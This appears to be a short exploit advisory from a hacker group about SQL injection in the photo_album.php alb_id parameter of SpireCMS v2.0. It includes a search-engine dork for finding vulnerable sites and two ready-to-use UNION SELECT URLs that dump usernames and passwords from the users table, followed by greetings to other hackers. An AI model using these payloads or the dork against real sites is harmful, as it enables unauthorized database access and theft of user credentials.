view source print? ALGERIAN HACKER **********************- NORTH-AFRICA SECURITY TEAM -*********************** [!] SpireCMS v2.0 SQL Injection Vulnerability [!] Author : Dr.0rYX and Cr3w-DZ [!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.spiread.com/ [+] script : SpireCMS v2.0 [+] Download : http://www.spiread.com/demo/ (sell script) [+] Vulnerability : php SQL injection [+] Dork :inurl:"photo_album.php?alb_id=" **************************************************************************/ [ Vulnerable File ] http://server/photo_album.php?alb_id=[N.A.S.T ] [ Exploit ] http://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password)+from+users http://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password),null+from+users [ GReets ] [+] :claw , le0n , exploit-db.com , ALL HACKERS MUSLIMS